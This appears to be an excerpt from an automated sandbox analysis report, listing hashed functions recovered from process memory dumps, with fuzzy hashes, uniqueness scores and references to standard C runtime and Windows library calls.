Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c70d59cd75d8d587692db9f92c7d4cabd3e4c5676d0fcb7d33be4e6561af67
Instruction ID: 116651eda56336f1a2b5ecbb0c36a390ab118cfb0c7ccfe0bb9793b4ca399772
Opcode Fuzzy Hash: 15c70d59cd75d8d587692db9f92c7d4cabd3e4c5676d0fcb7d33be4e6561af67
Instruction Fuzzy Hash: FA51D173E115298BE7048E19CC40259B693FBC4314F2FC679DC28EB285EAB9E912C6C0

Uniqueness

Uniqueness Score: 0.00%

Function 025EE0BC, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf639b38ebaf10992965a3d2d1446b7fa12f49dcf6f9ac56276de34dead19c9
Instruction ID: 2d60a70d433b7bcad08ea08f15b805c004a9497fa7936447950bed9c0ace0098
Opcode Fuzzy Hash: 1bf639b38ebaf10992965a3d2d1446b7fa12f49dcf6f9ac56276de34dead19c9
Instruction Fuzzy Hash: AB51C176F24560CBCB58CF1D880022EB7A7BBCA325B5E85A6D84AD7341DA309C81CBD4

Uniqueness

Uniqueness Score: 0.00%

Function 00FD5D7E, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d7f447b148d0456f8374d9f46bf3ffe24eb4c0c44286e1073fb211a9e0af74
Instruction ID: 97fc157731018a116f3b6dc22ad96b49bc93993cef85a9c90b0b719dbaf30fd4
Opcode Fuzzy Hash: 44d7f447b148d0456f8374d9f46bf3ffe24eb4c0c44286e1073fb211a9e0af74
Instruction Fuzzy Hash: FC617672509B95CFC712CF38C9867523BB2FB86720759028EEAA29B292C7742056DF45

Uniqueness

Uniqueness Score: 0.00%

Function 0266E139, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f331b144cfceb6c481d2eebfd1c2e4f9138ce443e2c56aa5149755a6c54b63
Instruction ID: c8cbc463e5808a8fa1a8597b766d9f127d99796d6bfe6a54eb86e05840bfcfa2
Opcode Fuzzy Hash: d1f331b144cfceb6c481d2eebfd1c2e4f9138ce443e2c56aa5149755a6c54b63
Instruction Fuzzy Hash: 9441D138104696DACB29CF69C484AF6FBF6BF49308F148849E8D58B641D337E856DB60

Uniqueness

Uniqueness Score: 0.00%

Function 00FC66C6, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80561760cfa710b977fd87d2447b57dd7be589777c65e92fe9b81949295d5ced
Instruction ID: 088cebf8e687730b8161f39489c78943e38560cb8b60a8f827ff9fc22ecb7683
Opcode Fuzzy Hash: 80561760cfa710b977fd87d2447b57dd7be589777c65e92fe9b81949295d5ced
Instruction Fuzzy Hash: B6B09223B8AA0C0A45208C8979050F9F360E287132E0023A6DD1DF31804A12C021518C

Uniqueness

Uniqueness Score: 0.00%

Function 02606270, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0868f3d47dfbcf698ae58fcfafb45de23f2cdf76d113acf4423f09c197357e8d
Instruction ID: 750ab35b00f4725b706a22acde219a98422d05be6421550b5ecb32f52b8f839d
Opcode Fuzzy Hash: 0868f3d47dfbcf698ae58fcfafb45de23f2cdf76d113acf4423f09c197357e8d
Instruction Fuzzy Hash: ECA0043D55404557D5315574C0045175511DF51341F1540517501C557DC57544555531

Uniqueness

Uniqueness Score: 0.00%

Function 02605A00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fb59abf45c3b56e16fb4c9e03373ea7e4545cd010e2412add8ea790a578e33
Instruction ID: b7c5a3a4b2124f8ba35c901143851379c8e0cb32ddd83c3670997d3845b60743
Opcode Fuzzy Hash: 26fb59abf45c3b56e16fb4c9e03373ea7e4545cd010e2412add8ea790a578e33
Instruction Fuzzy Hash: 4BA02238A0C00883CA00AA20C008A033200CF80380F028080B00ACA80FCA388C88EF20

Uniqueness

Uniqueness Score: 0.00%

Function 02606AA0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e99dbadc8a12e3c5af105c3adaf1553101de99065c198ca8ea0a71ce07b6a0
Instruction ID: 18e069752bbe514b0483dd6c79266e2999c882708402acfd253bd2fb4899310f
Opcode Fuzzy Hash: c4e99dbadc8a12e3c5af105c3adaf1553101de99065c198ca8ea0a71ce07b6a0
Instruction Fuzzy Hash: 5DA002BEF0400977E6416A74C408647A615EFB1301B15C4937981DA5CDCDA4996AC761

Uniqueness

Uniqueness Score: 0.00%

Function 02606340, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 372d4cfc9ab5ad1936d07e24e0ab0cedae525d804e4a94d9f1e73b554b39d23c
Instruction ID: bb7a1684b8db188dc9d8bbf266d2f891a6f42fd0de56fb123843888850c8e111
Opcode Fuzzy Hash: 372d4cfc9ab5ad1936d07e24e0ab0cedae525d804e4a94d9f1e73b554b39d23c
Instruction Fuzzy Hash: 9DA0023D6484096BE651AA64C4887476611DBD1301B158092F983CA54FCBA4C9AA9FA5

Uniqueness

Uniqueness Score: 0.00%

Function 02606B50, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3919f384137811d8b055ca447dbc4b9e41ba5fc56f2fcaa9346ed0d3bae369
Instruction ID: 29e4be75a2b89963b5582c65b5f4d3b92f39ea1cafb3fe286d84f28b20c99c2d
Opcode Fuzzy Hash: 2c3919f384137811d8b055ca447dbc4b9e41ba5fc56f2fcaa9346ed0d3bae369
Instruction Fuzzy Hash: EEA00239B1400A67D6055AA4C8086477651DBD2302B15C092F611CB54DCD74996587B5

Uniqueness

Uniqueness Score: 0.00%

Function 02606330, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee04f366f887b3e21fef78bd6aa54b9d72bfae85422afaf72bdcb7816ff5f1b
Instruction ID: 910565e8be35e1d7b6488f5666787f01b533cb55602e3dc498d561ca510c0d83
Opcode Fuzzy Hash: 7ee04f366f887b3e21fef78bd6aa54b9d72bfae85422afaf72bdcb7816ff5f1b
Instruction Fuzzy Hash: 02A0223820000A0BE200AA20C008003A230CFC0300B00C082F882CA00ECAA0C8AA8B22

Uniqueness

Uniqueness Score: 0.00%

Function 02606B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67de55f49b1cabe750ed3627e061c2f86d8ac6094294b2d549560649f16385e4
Instruction ID: 32300391abeb383f7ef05675f611082414943305d4ae098d8abf0cbe4f232a3f
Opcode Fuzzy Hash: 67de55f49b1cabe750ed3627e061c2f86d8ac6094294b2d549560649f16385e4
Instruction Fuzzy Hash: D7A0027DE08049E7D6115F64C40CF8BAB15DBB1305B25C09A7501DE98DCD64D955C761

Uniqueness

Uniqueness Score: 0.00%

Function 02605B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371acd29ba0cbe36f522b60fd4765a25298cba421278a28732632f3a0f83317e
Instruction ID: c52b3f9ddff149e34d272a35a20489746daf66f16d7251fbc674cfacfdf62fd7
Opcode Fuzzy Hash: 371acd29ba0cbe36f522b60fd4765a25298cba421278a28732632f3a0f83317e
Instruction Fuzzy Hash: 4AA0027960804597DA416A68C008F07EA61FFB1305F25C495B5C5CAD4DCD75C89AD761

Uniqueness

Uniqueness Score: 0.00%

Function 02606B80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87fd7b1fc0230c8493c51e3d9e75e09ed0cc9eddeab3d6f157ba78ce59da3f2
Instruction ID: 1313ec7daacae28107eaf5fb91601547b3f3fcc8454d9fdd22df6ecb55d9e9aa
Opcode Fuzzy Hash: d87fd7b1fc0230c8493c51e3d9e75e09ed0cc9eddeab3d6f157ba78ce59da3f2
Instruction Fuzzy Hash: AEA0023DB0400D67D6116E64C40CB5B6A16EBA1305B15C0AA7602CA55ECF7499569771

Uniqueness

Uniqueness Score: 0.00%

Function 02606000, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa97eb328c3ab5a479157c7dcb8ac6b4dde7c8371dd00472962ac3c007c4999
Instruction ID: b4ffce04e76459e84235709d930ea432b0953f1daac7b6787155fce6a48ac57a
Opcode Fuzzy Hash: 4aa97eb328c3ab5a479157c7dcb8ac6b4dde7c8371dd00472962ac3c007c4999
Instruction Fuzzy Hash: 03A02238A0C00C83C2000AA0C008F03AA00EBA0302F0080C23302CA82ECE308880C230

Uniqueness

Uniqueness Score: 0.00%

Function 026068F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f12ed937c47c7dd465b97099fa1c05156f3ec27b4a4b476f2295764e549c93
Instruction ID: 1799e6611e63379f086d4aa7de519a219d771d15c78ccc9d28982210153b3ad3
Opcode Fuzzy Hash: a6f12ed937c47c7dd465b97099fa1c05156f3ec27b4a4b476f2295764e549c93
Instruction Fuzzy Hash: F9A0223C20000883E2002B20CC0800B2220EF80300F008080B002CA00ECA208B088B20

Uniqueness

Uniqueness Score: 0.00%

Function 02606160, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f662f5ca7611c26b36819893e8f92d71315ee66a9c765f449dd8bbfa2dce4dd1
Instruction ID: 664ff3ddf0701f58cece989fd753f1c9ee612a0b615d8e67cd2353615774df7e
Opcode Fuzzy Hash: f662f5ca7611c26b36819893e8f92d71315ee66a9c765f449dd8bbfa2dce4dd1
Instruction Fuzzy Hash: D0A0023960444957D6016A65C00CB0B6A11EBD1312F15C4D27612DA55ECA758855D631

Uniqueness

Uniqueness Score: 0.00%

Function 02606100, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce08541890df44542f4f2f62f35b17e52623052a7ea5316d59f388567d2bd3c
Instruction ID: 80e917ac3c844a86e393012b42ddec3e452bdbfa91ae273045c942d70655a1ac
Opcode Fuzzy Hash: 1ce08541890df44542f4f2f62f35b17e52623052a7ea5316d59f388567d2bd3c
Instruction Fuzzy Hash: A0A02238B082C883C2000A20C008F0B2A00CBA0302F20C0C03303CA80ECE308800C232

Uniqueness

Uniqueness Score: 0.00%

Function 026056F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e085ef60ae981008dee80c36b2ac83ddb5a112d93d776da46d4fe2bef9ba3557
Instruction ID: 3610442f72b4de79fa749722000d50578d49f0b805c77ea0c7af8c2156a1f238
Opcode Fuzzy Hash: e085ef60ae981008dee80c36b2ac83ddb5a112d93d776da46d4fe2bef9ba3557
Instruction Fuzzy Hash: 37A022B820000883C2000A20C02CB032200CBA2300F02C080B202CA00EFE2ACC808222

Uniqueness

Uniqueness Score: 0.00%

Function 02606720, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d111e0dffe6c8aae4ff621de546cd5c34f73196d4ba2319f5209ce48bd730d6
Instruction ID: e587582af5e1509477070009704ac4e6dc5bcf2ef12d7bc2a7592ba90a19ca91
Opcode Fuzzy Hash: 6d111e0dffe6c8aae4ff621de546cd5c34f73196d4ba2319f5209ce48bd730d6
Instruction Fuzzy Hash: DAA00239608009EBD7015EB7DC085476611DB91311F1580927606DA56ECA788859D631

Uniqueness

Uniqueness Score: 0.00%

Function 02605730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27c93b771274a534bd00b0db147eab970b70a20ce670ba605574c1790e05276
Instruction ID: 90340614514638cea43cf6cfed06c9078226b9473a2343700f97ca009afde2b5
Opcode Fuzzy Hash: c27c93b771274a534bd00b0db147eab970b70a20ce670ba605574c1790e05276
Instruction Fuzzy Hash: A6A022B830000803C2000B28C03C3032200CBC2300F02C080B202CA08ECAAC8C02C222

Uniqueness

Uniqueness Score: 0.00%

Function 02605790, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2ac7938604a327c0c29428dd0af38acd597895b80ab3802e97909fc399a5889
Instruction ID: de3142b7edf7ff6078a9b2f844f65256616dcb47f7439c16c335668ec77f6094
Opcode Fuzzy Hash: f2ac7938604a327c0c29428dd0af38acd597895b80ab3802e97909fc399a5889
Instruction Fuzzy Hash: E2A0223820000003C2008A20C00830B2300CFC0302F008080B200CA00EC8308C208F20

Uniqueness

Uniqueness Score: 0.00%

Function 02680AB6, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 425COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT ref: 02680BF7
_wcspbrk.LIBCMT ref: 02680C35
_wcspbrk.LIBCMT ref: 02680D1C
_wcspbrk.LIBCMT ref: 02680D5A
_wcspbrk.LIBCMT ref: 02680E41
_wcspbrk.LIBCMT ref: 02680E77

Strings

Kernel-MUI-Language-Disallowed, xrefs: 02680CB2
Kernel-MUI-Language-Allowed, xrefs: 02680B83
Kernel-MUI-Language-SKU, xrefs: 02680DD7
WindowsExcludedProcs, xrefs: 02680AF5
Kernel-MUI-Number-Allowed, xrefs: 02680B42

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: f15503cd0f49673fcfcdfcbae7abb008a41b7f9d489eedcaa2a8104fc854e152
Instruction ID: 5fcce76b6b55317cd0cb761ff7f77ade331f5d6564cb13288bec7bdaa892ddb1
Opcode Fuzzy Hash: f15503cd0f49673fcfcdfcbae7abb008a41b7f9d489eedcaa2a8104fc854e152
Instruction Fuzzy Hash: A0F10AB2D00209EFCB51EF94C980EEEB7B9FF08304F14456AE605A7261D735AA49DF64

Uniqueness

Uniqueness Score: 4.31%

Function 025CE2ED, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 025CC2E4
___swprintf_l.LIBCMT ref: 025CE391
___swprintf_l.LIBCMT ref: 025CE3B6
___swprintf_l.LIBCMT ref: 025CE500
___swprintf_l.LIBCMT ref: 0264F372
___swprintf_l.LIBCMT ref: 0264F3BB

Strings

ffff:, xrefs: 0264F34D
::ffff:0:%u.%u.%u.%u, xrefs: 0264F3B2
:%u.%u.%u.%u, xrefs: 025CC2DB
::%hs%u.%u.%u.%u, xrefs: 0264F369

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 854f36e3f760c8898da27395b31f56fb0a52d57e9810f026244dff91190d7c09
Instruction ID: 92cdea9daca491fa949f2920c7df136e26f2a2d6f67d8c431ddfeba6d25d0bc3
Opcode Fuzzy Hash: 854f36e3f760c8898da27395b31f56fb0a52d57e9810f026244dff91190d7c09
Instruction Fuzzy Hash: F36104B1910615AEDB38CF99C8818BFBFB6FF88704B64C42DE59646680E774B740CB64

Uniqueness

Uniqueness Score: 0.11%

Function 025D36FF, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 270COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 025D36DC
__fassign.LIBCMT ref: 025D384A
__fassign.LIBCMT ref: 02638C45

Part of subcall function 025D38A2: __cftof.LIBCMT ref: 025D38B2

__fassign.LIBCMT ref: 02638D05

Strings

:, xrefs: 025D3793
:, xrefs: 025D3687
., xrefs: 02638BF4

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: __fassign$__cftof
String ID: .$:$:
API String ID: 719083814-2308638275
Opcode ID: 25f70dd641341ea5311542b4fa7a36f4ebe3784646799533f4f8e31e6898c28b
Instruction ID: dca516ebd9ec68ef1990e62c76273b32ebd299a8072b2883e8ecf20931dc0d91
Opcode Fuzzy Hash: 25f70dd641341ea5311542b4fa7a36f4ebe3784646799533f4f8e31e6898c28b
Instruction Fuzzy Hash: D1A18E71D4620AFADF35CF68C8447AEBBB5BF01324F1484AAE451A7280D7349A85CF5A

Uniqueness

Uniqueness Score: 3.32%

Function 025EA16C, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196UNIQUE

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02642087
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026420EF

Strings

RTL: Re-Waiting, xrefs: 026420BB, 02642123
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0264208F
RTL: Resource at %p, xrefs: 0264209E, 02642106
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026420F7

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 2c7f2f9eca8ffba84890609d434ab5ea733305235a663853156af015f73ee5bc
Instruction ID: 81ca0eff99df780a2bf3ab5def08eecf2fbd281f14ece52c1d27c59e6503af32
Opcode Fuzzy Hash: 2c7f2f9eca8ffba84890609d434ab5ea733305235a663853156af015f73ee5bc
Instruction Fuzzy Hash: FB51FD717042115BEB189A24CCD1FA7739AABC4B24F304259ED569B2C5DE71EC41C6A8

Uniqueness

Uniqueness Score: 100.00%

Function 00FB2343, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00FB9320,00000008,00FB244B,00000000,00000000,?,?,00FB2478,?,00FB1787,00FB9270,00000008,00FB10B4), ref: 00FB2354
__lock.LIBCMT ref: 00FB2388

Part of subcall function 00FB41E2: __mtinitlocknum.LIBCMT ref: 00FB41F8
Part of subcall function 00FB41E2: __amsg_exit.LIBCMT ref: 00FB4204
Part of subcall function 00FB41E2: EnterCriticalSection.KERNEL32(MZER,MZER,?,00FB238D,0000000D), ref: 00FB420C

InterlockedIncrement.KERNEL32(206E6920), ref: 00FB2395
__lock.LIBCMT ref: 00FB23A9
___addlocaleref.LIBCMT ref: 00FB23C7

Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(00FB10B4), ref: 00FB3057
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(8B00FB71), ref: 00FB3064
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(080460A3), ref: 00FB3071
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(5051144D), ref: 00FB307E
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(8B00FB71), ref: 00FB308B
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(8B00FB71), ref: 00FB30A7
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(D0458957), ref: 00FB30B7
Part of subcall function 00FB3045: InterlockedIncrement.KERNEL32(3D8B29C0), ref: 00FB30CD

Strings

KERNEL32.DLL, xrefs: 00FB234F

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: IncrementInterlocked$__lock$CriticalEnterHandleModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 4007360741-2576044830
Opcode ID: 3be1913106cfced759b5a14a59d7ada3b6c7007a4abb978144af812c2283e5e9
Instruction ID: 07464f19e9e96bc970af02e1f9bd09019911bb84aba3c8bfb11fd42597c204c9
Opcode Fuzzy Hash: 3be1913106cfced759b5a14a59d7ada3b6c7007a4abb978144af812c2283e5e9
Instruction Fuzzy Hash: FE01C471844700EFD760BF6ACC45389FBF0AF40320F20850EE595966E1CBB8A644EF15

Uniqueness

Uniqueness Score: 1.40%

Function 00FB2B82, Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00FB2B8E

Part of subcall function 00FB2470: __getptd_noexit.LIBCMT ref: 00FB2473
Part of subcall function 00FB2470: __amsg_exit.LIBCMT ref: 00FB2480

__amsg_exit.LIBCMT ref: 00FB2BAE

Part of subcall function 00FB1FDF: __FF_MSGBANNER.LIBCMT ref: 00FB1FE4
Part of subcall function 00FB1FDF: __NMSG_WRITE.LIBCMT ref: 00FB1FEC

__lock.LIBCMT ref: 00FB2BBE

Part of subcall function 00FB41E2: __mtinitlocknum.LIBCMT ref: 00FB41F8
Part of subcall function 00FB41E2: __amsg_exit.LIBCMT ref: 00FB4204
Part of subcall function 00FB41E2: EnterCriticalSection.KERNEL32(MZER,MZER,?,00FB238D,0000000D), ref: 00FB420C

InterlockedDecrement.KERNEL32(?), ref: 00FB2BDB
_free.LIBCMT ref: 00FB2BEE

Part of subcall function 00FB4B46: HeapFree.KERNEL32(00000000,00000000), ref: 00FB4B5C
Part of subcall function 00FB4B46: GetLastError.KERNEL32(00000000,?,00FB2461,00000000,?,?,00FB2478,?,00FB1787,00FB9270,00000008), ref: 00FB4B6E

InterlockedIncrement.KERNEL32(005B1638), ref: 00FB2C06

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: __amsg_exit$Interlocked$CriticalDecrementEnterErrorFreeHeapIncrementLastSection__getptd__getptd_noexit__lock__mtinitlocknum_free
String ID:
API String ID: 741022032-0
Opcode ID: 94e2ba7d05564a73d67ceeef19b9fe07a71988fb111ca41f05fc5fde290db517
Instruction ID: 1d31add6e8f3e6fc85de24e27f19d3a2f9a22e099c95a9c53352a4c9aafe4fb6
Opcode Fuzzy Hash: 94e2ba7d05564a73d67ceeef19b9fe07a71988fb111ca41f05fc5fde290db517
Instruction Fuzzy Hash: 2B01C036D00716ABC7A5AF2B8885BDD7760BF44730F154205E810A7291CF38AA80FFD2

Uniqueness

Uniqueness Score: 0.65%

Function 025CE3E6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 025CE434

Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 025CC2E4
Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 025CE391
Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 025CE3B6
Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 025CE500
Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 0264F372
Part of subcall function 025CE2ED: ___swprintf_l.LIBCMT ref: 0264F3BB

___swprintf_l.LIBCMT ref: 025CE463
___swprintf_l.LIBCMT ref: 025CE48F

Strings

]:%u, xrefs: 025CE486
%%%u, xrefs: 025CE45A

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 5942d44ce15f3a52a53657869ffd68c362fcc72121e533906e1efccb7e5794c0
Instruction ID: 4d90d73c7873d71a527a4e0f2f8fbfe124e5195cde2b2789ce710be87720abe7
Opcode Fuzzy Hash: 5942d44ce15f3a52a53657869ffd68c362fcc72121e533906e1efccb7e5794c0
Instruction Fuzzy Hash: 4421D5B290062AAFDB21DE58CC81AEFB7ADFB49304F484416F945D3140EB70AA54CBE4

Uniqueness

Uniqueness Score: 0.11%

Function 00FB5D59, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00FB5D67

Part of subcall function 00FB16C5: __FF_MSGBANNER.LIBCMT ref: 00FB16DE
Part of subcall function 00FB16C5: __NMSG_WRITE.LIBCMT ref: 00FB16E5
Part of subcall function 00FB16C5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00FB4B91,00FB10B4,00000001,00FB10B4,?,00FB416D,00000018,00FB93F0,0000000C,00FB41FD), ref: 00FB170A

_free.LIBCMT ref: 00FB5D7A

Part of subcall function 00FB4B46: HeapFree.KERNEL32(00000000,00000000), ref: 00FB4B5C
